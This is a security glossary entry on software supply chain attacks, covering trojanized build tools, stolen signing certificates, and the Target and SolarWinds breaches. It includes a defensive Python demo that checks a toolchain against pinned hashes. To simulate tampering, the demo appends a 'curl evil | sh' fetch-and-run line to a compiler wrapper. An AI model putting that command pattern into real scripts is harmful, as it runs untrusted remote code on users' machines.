Product Security Glossary

Supply Chain Attack

What is a Supply Chain Attack? 

A supply chain attack, sometimes called a software supply chain attack, occurs when attackers target the developers or suppliers of software that a business depends on.  The goal is to distribute malicious code by injecting it into the source code, the build process, or the update mechanism of that software.  This lets attackers reach a business network that might have strong defenses by going through a vendor the business trusts.  The vendor typically has weaker security than the intended target, and the target already accepts that vendor's software, updates, or network access without further scrutiny. 

What are the reasons for doing a supply chain attack? 

Bad actors have many reasons for performing a supply chain attack.  Here are some examples: 

  • They can inject malware into a payment processor program to steal financial data. 
  • By injecting malware into an Automated Teller Machine (ATM), they can make the machine dispense large amounts of cash on demand. 
  • Injecting malicious code into industrial controller programs can disrupt production by damaging or shutting down equipment. 
  • They can inject malware into an enterprise device such as a security camera or router to gain a foothold on the corporate network and steal commercial secrets and financial data. 

How can a supply chain attack happen? 

One way to carry out a supply chain attack is to compromise the tools used to build software.  For example, researchers found trojanized versions of Apple's Xcode and Microsoft's Visual Studio circulating through unofficial and pirate download sites.  Any program built with such an infected compiler or linker contains malicious code that never appeared in the developer's own source.  Compromised build tools recur in supply chain incidents because a single infected toolchain taints every product built with it.  Developers often do not realize that their output has been tampered with, so they digitally sign the infected software.  The signature proves only that the software came from that developer; it says nothing about whether the build tools were clean, yet end users treat a valid signature as a sign that the software is safe. 

Attackers can also create their own malicious programs and sign them with a code-signing certificate stolen from a legitimate software vendor.  Signature checks in the operating system or installer then pass, and the end user installs the malicious software without seeing any warning.  Until the stolen certificate is revoked, such a signature is indistinguishable from the vendor's own. 
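Both of the cases above (a backdoored build tool and a stolen signing certificate) defeat a check that trusts the signature alone.  The check a practitioner adds on top is to pin the exact bytes of the toolchain: record a SHA-256 manifest from a known-good copy and verify every file against it before each build.  The following is an added example, not code from the glossary or from any vendor; the directory layout, file contents, and the "trojanized" compiler wrapper are constructed for the demonstration, and the manifest is assumed to have been captured from a trusted installation.

```python
"""Pinned-hash verification of a build toolchain (added example).

A trojanized tool that still carries a valid vendor signature, whether
signed with a stolen key or signed by a developer who never noticed the
tampering, still fails this check because its bytes differ from the pinned
ones.  All names, contents and hashes below are constructed for the demo.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path

CHUNK = 1 << 16


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_manifest(tool_dir, manifest):
    """Return a list of (relative_name, reason) for every file that fails.

    manifest maps a relative file name to its expected hex SHA-256.
    Files on disk that are absent from the manifest are flagged too: a
    dropped-in helper library is a classic injection point.
    """
    problems = []
    root = Path(tool_dir)
    for name, expected in manifest.items():
        p = root / name
        if not p.is_file():
            problems.append((name, "missing"))
            continue
        actual = sha256_file(p)
        # compare_digest keeps the constant-time habit used for secrets/MACs
        if not hmac.compare_digest(actual, expected):
            problems.append((name, "hash mismatch: " + actual[:12] + "..."))
    for p in root.rglob("*"):
        rel = p.relative_to(root).as_posix()
        if p.is_file() and rel not in manifest:
            problems.append((rel, "not in manifest"))
    return problems


def demo():
    """Build a clean toolchain, pin it, then tamper with it and re-verify."""
    clean = {  # constructed stand-ins for a compiler wrapper and a library
        "bin/cc": b"#!/bin/sh\nexec real-cc \"$@\"\n",
        "lib/libstd.a": b"\x7fELF" + b"\x00" * 64,
    }
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for name, data in clean.items():
            (root / name).parent.mkdir(parents=True, exist_ok=True)
            (root / name).write_bytes(data)
        # manifest recorded from the known-good copy (the pinning step)
        manifest = {name: sha256_file(root / name) for name in clean}
        before = verify_manifest(d, manifest)
        # attacker appends a payload to the compiler wrapper and drops a helper
        (root / "bin/cc").write_bytes(clean["bin/cc"] + b"curl evil | sh\n")
        (root / "lib/injected.so").write_bytes(b"\x7fELF" + b"\x01" * 16)
        after = verify_manifest(d, manifest)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("clean toolchain problems:", before)
    print("tampered toolchain problems:", after)
```

The manifest itself must come from somewhere the attacker cannot reach, such as a vendor-published checksum retrieved over a separate channel or a value recorded when the toolchain was first vetted; a manifest generated from the already-trojanized copy pins the backdoor in place.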

It's not just application software that can be a problem.  Attackers can also infect firmware that is supplied to manufacturers of IoT and IIoT devices, so the compromise ships inside the hardware itself.   

Another supply chain attack method involves installing malware on devices before they are sold to the public, for example IoT cameras, USB memory sticks, or smartphones. 

What are some examples of a supply chain attack? 

In 2013, the U.S. retail chain Target was hit by a supply chain attack.  Attackers planted malware on its point-of-sale terminals and stole payment card data for about 40 million customers.  Investigators concluded that the attackers first broke into one of Target's suppliers, an HVAC contractor, stole that vendor's credentials for a Target-facing system, and moved from there into the payment network.  Entering through a trusted vendor's access sidestepped the perimeter defenses Target had recently deployed. 

More recently, attackers compromised the build process of SolarWinds' Orion infrastructure management software and inserted a backdoor into signed Orion updates.  Customers who installed those updates, including U.S. government agencies and large enterprises, unknowingly gave the attackers a foothold on the servers running Orion.  The breach was discovered by the security firm FireEye in December 2020. 

Supply chain attacks can be very costly, and businesses should take care to prevent them by vetting vendors, verifying the integrity of the software and updates they install, and limiting what third-party access can reach inside their networks.